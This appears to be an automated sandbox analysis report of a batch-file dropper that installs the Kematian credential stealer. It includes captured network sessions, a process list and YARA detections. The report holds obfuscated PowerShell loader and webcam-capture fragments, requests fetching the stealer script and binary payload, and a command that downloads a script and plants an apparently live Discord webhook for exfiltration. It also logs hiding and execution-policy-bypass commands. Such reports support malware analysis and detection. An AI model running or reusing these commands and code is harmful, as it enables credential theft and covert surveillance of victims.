                                        Date: Fri, 05 Jul 2024 04:26:39 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-nyc-kteb1890099-NYC
                                        X-Cache: MISS
                                        X-Cache-Hits: 0
                                        X-Timer: S1720153599.485511,VS0,VE46
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 25104983a3530a3481da6464c65fc68558a3f8ea
                                        Expires: Fri, 05 Jul 2024 04:31:39 GMT
                                        Source-Age: 0
                                        2024-07-05 04:26:39 UTC | 1378 | IN | Data Ascii: function Get-WebCamImage { # made by https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1 $source = @" using System; using System.Collections.Generic; using System.Text; using System.Collections; using
                                        2024-07-05 04:26:39 UTC | 1378 | IN | Data Ascii: Point = "SendMessageA")] protected static extern int SendMessage(int hwnd, int wMsg, int wParam, [MarshalAs(UnmanagedType.AsAny)] object lParam); [DllImport("user32")] protected static extern int SetWindowPos(in
                                        2024-07-05 04:26:39 UTC | 1378 | IN | Data Ascii: LD, 0, 0, windowWidth, windowHeight, handle, 0); if (SendMessage(deviceHandle, WM_CAP_DRIVER_CONNECT, this.index, 0) > 0) { SendMessage(deviceHandle, WM_CAP_SET_SCALE, -1, 0);
                                        2024-07-05 04:26:39 UTC | 1378 | IN | Data Ascii: lpszName, int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref String lpszVer, int cbVer); static ArrayList devices = new ArrayList(); public static Device[] GetAllDevices() {
                                        2024-07-05 04:26:39 UTC | 941 | IN | Data Ascii: bly]::loadwithpartialname("System.Windows.Forms") | Out-Null [reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null $picCapture = New-Object System.Windows.Forms.PictureBox try { $devices = [WebCamLi


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        5 | 192.168.2.4 | 63777 | 140.82.121.3 | 443 | 3852 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-07-05 04:26:54 UTC | 133 | OUT | GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1
                                        Host: github.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:55 UTC | 584 | IN | HTTP/1.1 302 Found
                                        Server: GitHub.com
                                        Date: Fri, 05 Jul 2024 04:26:55 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                        Access-Control-Allow-Origin:
                                        Location: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1
                                        Cache-Control: no-cache
                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                        X-Frame-Options: deny
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 0
                                        Referrer-Policy: no-referrer-when-downgrade
                                        2024-07-05 04:26:55 UTC | 3030 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        6 | 192.168.2.4 | 63778 | 185.199.110.133 | 443 | 3852 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-07-05 04:26:55 UTC | 144 | OUT | GET /Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:55 UTC | 899 | IN | HTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 2974
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "fe3aacdc6907ec951179c5b0e10c992291900e024a0164ca4a7fbbedb7ebcc17"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: C00A:FCE48:21EE03:25AFB9:66877607
                                        Accept-Ranges: bytes
                                        Date: Fri, 05 Jul 2024 04:26:55 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-nyc-kteb1890099-NYC
                                        X-Cache: MISS
                                        X-Cache-Hits: 0
                                        X-Timer: S1720153616.851618,VS0,VE53
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: c5d6769d1ded693c67a2321aae728227715df841
                                        Expires: Fri, 05 Jul 2024 04:31:55 GMT
                                        Source-Age: 0
                                        2024-07-05 04:26:55 UTC | 1378 | IN | Data Ascii: $ProgressPreference = 'SilentlyContinue'function KematianLoader { Param ($kematian_modules, $kematian_func) $assem = ([AppDomain]::"cUrRENtdOMAin".('G' + 'e' + 'tA' + 'ssemblies').Invoke() | ? { $_."GLoBALAsSeMBlYcAche" -And $_."lOCaTioN".('Sp
                                        2024-07-05 04:26:55 UTC | 1378 | IN | Data Ascii: deBySig, Public', [System.Reflection.CallingConventions]::"standARD", $func).('SetImple' + 'ment' + 'atio' + 'n' + 'Flag' + 's').Invoke('Runtime, Managed') $type.('Defi' + 'n' + 'eMethod').Invoke('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delT
                                        2024-07-05 04:26:55 UTC | 218 | IN | Data Ascii: ervices.Marshal]::('G' + 'etD' + 'ele' + 'gateF' + 'orFunctionP' + 'ointer').Invoke((KematianLoader kernel32.dll WaitForSingleObject), (kematian_delegates @([IntPtr], [Int32])([Int])))."iNVOkE"($hThread, 0xFFFFFFFF)


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        7 | 192.168.2.4 | 63779 | 140.82.121.3 | 443
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-07-05 04:26:56 UTC | 204 | OUT | GET /Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: github.com
                                        2024-07-05 04:26:57 UTC | 997 | IN | HTTP/1.1 302 Found
                                        Server: GitHub.com
                                        Date: Fri, 05 Jul 2024 04:26:56 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                        Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240705%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240705T042656Z&X-Amz-Expires=300&X-Amz-Signature=9ec541a8af7357a745f9ee7f2924807d0564c84d8046cdea1a2096e0b623e658&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream
                                        Cache-Control: no-cache
                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                        X-Frame-Options: deny
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 0
                                        Referrer-Policy: no-referrer-when-downgrade
                                        2024-07-05 04:26:57 UTC | 3031 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        8 | 192.168.2.4 | 63780 | 185.199.111.133 | 443 | 3852 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-07-05 04:26:57 UTC | 683 | OUT | GET /github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240705%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240705T042656Z&X-Amz-Expires=300&X-Amz-Signature=9ec541a8af7357a745f9ee7f2924807d0564c84d8046cdea1a2096e0b623e658&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: objects.githubusercontent.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:57 UTC | 771 | IN | HTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 3992755
                                        Content-Type: application/octet-stream
                                        Last-Modified: Sun, 30 Jun 2024 05:35:21 GMT
                                        ETag: "0x8DC98C66EE845A6"
                                        Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                        x-ms-request-id: be5d7460-101e-0036-11af-ca6c25000000
                                        x-ms-version: 2020-10-02
                                        x-ms-creation-time: Sun, 30 Jun 2024 05:35:21 GMT
                                        x-ms-lease-status: unlocked
                                        x-ms-lease-state: available
                                        x-ms-blob-type: BlockBlob
                                        Content-Disposition: attachment; filename=kematian.bin
                                        x-ms-server-encrypted: true
                                        Via: 1.1 varnish, 1.1 varnish
                                        Accept-Ranges: bytes
                                        Age: 0
                                        Date: Fri, 05 Jul 2024 04:26:57 GMT
                                        X-Served-By: cache-iad-kcgs7200102-IAD, cache-ewr18128-EWR
                                        X-Cache: HIT, MISS
                                        X-Cache-Hits: 2011, 0
                                        X-Timer: S1720153618.605705,VS0,VE47



                                        Target ID:0
                                        Start time:00:25:53
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:1
                                        Start time:00:25:53
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:2
                                        Start time:00:25:53
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:cscript //nologo temp.vbs
                                        Imagebase:0x7ff686ce0000
                                        File size:161'280 bytes
                                        MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:3
                                        Start time:00:25:54
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:4
                                        Start time:00:25:54
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:5
                                        Start time:00:25:54
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:6
                                        Start time:00:25:56
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:00:25:56
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:8
                                        Start time:00:25:56
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff71e800000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:9
                                        Start time:00:25:58
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:10
                                        Start time:00:25:59
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:00:25:59
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:12
                                        Start time:00:25:59
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:13
                                        Start time:00:25:59
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:14
                                        Start time:00:26:01
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:00:26:02
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\chcp.com
                                        Wow64 process (32bit):false
                                        Commandline:chcp 65001
                                        Imagebase:0x7ff7e47b0000
                                        File size:14'848 bytes
                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:00:26:02
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell.exe -nop -c "Write-Host -NoNewLine $null"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:00:26:04
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:00:26:05
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\net.exe
                                        Wow64 process (32bit):false
                                        Commandline:net session
                                        Imagebase:0x7ff641d50000
                                        File size:59'904 bytes
                                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:00:26:05
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\net1.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\net1 session
                                        Imagebase:0x7ff612a00000
                                        File size:183'808 bytes
                                        MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:20
                                        Start time:00:26:05
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Source: 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Source: 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        Target ID:22
                                        Start time:00:26:09
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\doskey.exe
                                        Wow64 process (32bit):false
                                        Commandline:doskey CALL=SHIFT
                                        Imagebase:0x7ff6c6cc0000
                                        File size:20'480 bytes
                                        MD5 hash:F6D134052BCB12103B729E4D2EA15B91
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:00:26:09
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\attrib.exe
                                        Wow64 process (32bit):false
                                        Commandline:attrib +h +s kematian.ps1
                                        Imagebase:0x7ff6d3870000
                                        File size:23'040 bytes
                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:00:26:09
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:25
                                        Start time:00:26:09
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:26
                                        Start time:00:26:10
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:27
                                        Start time:00:26:11
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:00:26:11
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:29
                                        Start time:00:26:11
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:00:26:11
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:31
                                        Start time:00:26:11
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:33
                                        Start time:00:26:16
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:34
                                        Start time:00:26:16
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:35
                                        Start time:00:26:16
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:36
                                        Start time:00:26:16
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:39
                                        Start time:00:26:26
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:wscript /b
                                        Imagebase:0x7ff604250000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:40
